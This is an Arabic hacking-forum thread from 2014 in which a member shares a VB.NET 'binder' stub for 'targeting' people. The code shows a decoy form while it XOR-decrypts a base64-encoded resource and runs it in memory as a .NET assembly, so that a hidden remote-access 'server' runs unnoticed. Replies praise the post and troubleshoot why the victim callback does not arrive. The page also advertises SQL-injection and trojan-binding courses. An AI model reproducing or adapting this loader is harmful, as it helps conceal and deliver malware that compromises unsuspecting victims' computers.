1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ طريقه ] تلغيمة عن طريق Enter point

الموضوع في 'حماية الأجهزة' بواسطة المشاغب المغربي, بتاريخ ‏10 أغسطس 2014.

كاتب الموضوع : المشاغب المغربي المشاهدات : 1,444 الردود : 17 ‏10 أغسطس 2014
حالة الموضوع:
مغلق
  1. غير متصل

    المشاغب المغربي
    ExpErt DeveloPer

    عضو منذ:
    ‏23 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:

    بسم الله الرحمن الرحيم .
    السلام عليكم و رحمة الله و بركاته .
    [​IMG]

    سأقدم لكم تلغيمة بسيطة تفيد من يريد إستهداف
    يعني تخلي سيرفر هو البرنامج وسيكون كأنو مشغل البرنامج
    عادي ما فيه شيأ لشك لأننا سنزيل تتبيت في جميع لأماكن
    وسنستعمل طريقة enter point

    الكود الدي إستعملت جاهز .

    كود:
    [COLOR=DarkGreen]Module Module2
     
        Sub Main(ByVal aa As String())
            Form1.Show()
            Dim awx As Byte() = XORDecrypt(Convert.FromBase64String(My.Resources.String1), "KeyEncrypt")
            Dim ww As Object() = New Object(-1) {}
            Dim qs As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(awx)
            If qs.EntryPoint.GetParameters().Length > 0 Then
                ww = New Object() {aa}
            End If
            qs.EntryPoint.Invoke(Nothing, ww)
        End Sub
        Public Function XORDecrypt(ByVal xwxw As Byte(), ByVal dcf As String) As Byte()
            Dim dcbhg As Byte() = System.Text.Encoding.ASCII.GetBytes(dcf)
            Dim fcdff As Integer = xwxw(xwxw.Length - 1) Xor 112
            Dim dfetgf(xwxw.Length) As Byte
            Dim vvvbv As Integer
            For ssdd As Integer = 0 To xwxw.Length - 1
                dfetgf(ssdd) = (xwxw(ssdd) Xor fcdff) Xor dcbhg(vvvbv)
                If vvvbv = dcf.Length - 1 Then vvvbv = 0 Else vvvbv = vvvbv + 1
            Next
            ReDim Preserve dfetgf(xwxw.Length - 2)
            Return dfetgf
        End Function
    End Module[/COLOR]


    لأن مع شرح فيديو

    إضغط على أيقونة

    [YOUTUBE]v0L6vs2rF0g[/YOUTUBE]

    أخوكم المشاغب [​IMG][​IMG]
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    iraq-bzon
    rank
    Developer

    عضو منذ:
    ‏2 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيمة عن طريق Enter point قديم

    good and thanks
     


  3. غير متصل

    sєиɪσя нσssαм ★ Abu Nabil ★
    V • I • P

    عضو منذ:
    ‏11 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: تلغيمة عن طريق Enter point قديم

    مآشآء الله عليك يآ آيوب مبدع من يومك يآدب
    والله كم آشتقت لك ولموآضيعك حبيبى آيوب
    جآرى تقييمك + الفآيف ستآرز + آحلى لآيك
    آستمر حبيبى آيوب ولآ توقف
    فلك مستقبل كبير يآدب
    !:"
     


  4. غير متصل

    المشاغب المغربي
    ExpErt DeveloPer

    عضو منذ:
    ‏23 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:

    رد: تلغيمة عن طريق Enter point قديم

    العفو أخي :*



    شكرا لك صديقي منكم نتعلم
    إن شاء الله كل خير <3

     


  5. غير متصل

    V!P-Hero
    DeveloPer Plus

    عضو منذ:
    ‏27 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الإقامة:

    رد: تلغيمة عن طريق Enter point قديم

    تِسلَم آيدَك آخيْ آلغآليْ عَ هذآ آلطَرحْ آلمُميزْ ~ ،،

    تحيآتيْ لَك ~
     


  6. غير متصل

    MaDe IN K.s.A <div class="smallfont"><script src="http://www.iq-
    ExpErt DeveloPer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: تلغيمة عن طريق Enter point قديم

    طرحت فآبدعت واصل يامبدع ً#ٌ5oًًًُ.
     


  7. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: تلغيمة عن طريق Enter point قديم

    عشت حبي
    بارك الله بيك
    أريد اداة استخراج الريسورس من السيرفر

     


  8. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: تلغيمة عن طريق Enter point قديم

    حبي جربت الطريقة
    بس السيرفر لا يعمل والتبليغ لا يصل
    وعندما اريد تحويل الفورم الى ميدل لا استطيع
    تخرج لي فقط الفورمم
    [​IMG]
     


  9. غير متصل

    المشاغب المغربي
    ExpErt DeveloPer

    عضو منذ:
    ‏23 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:

    رد: تلغيمة عن طريق Enter point قديم


    [​IMG] تفضل

    [​IMG]
     


  10. غير متصل

    ƁƛƬ MƛƝ
    V • I • P

    عضو منذ:
    ‏16 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    15
    نقاط الجائزة:
    الوظيفة:
    web development

    رد: تلغيمة عن طريق Enter point قديم

    شرح رائع اخي ايوب

    مبدع بمعنى الكلمة تلغيمه رائعه

    فعلا مشاغب
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...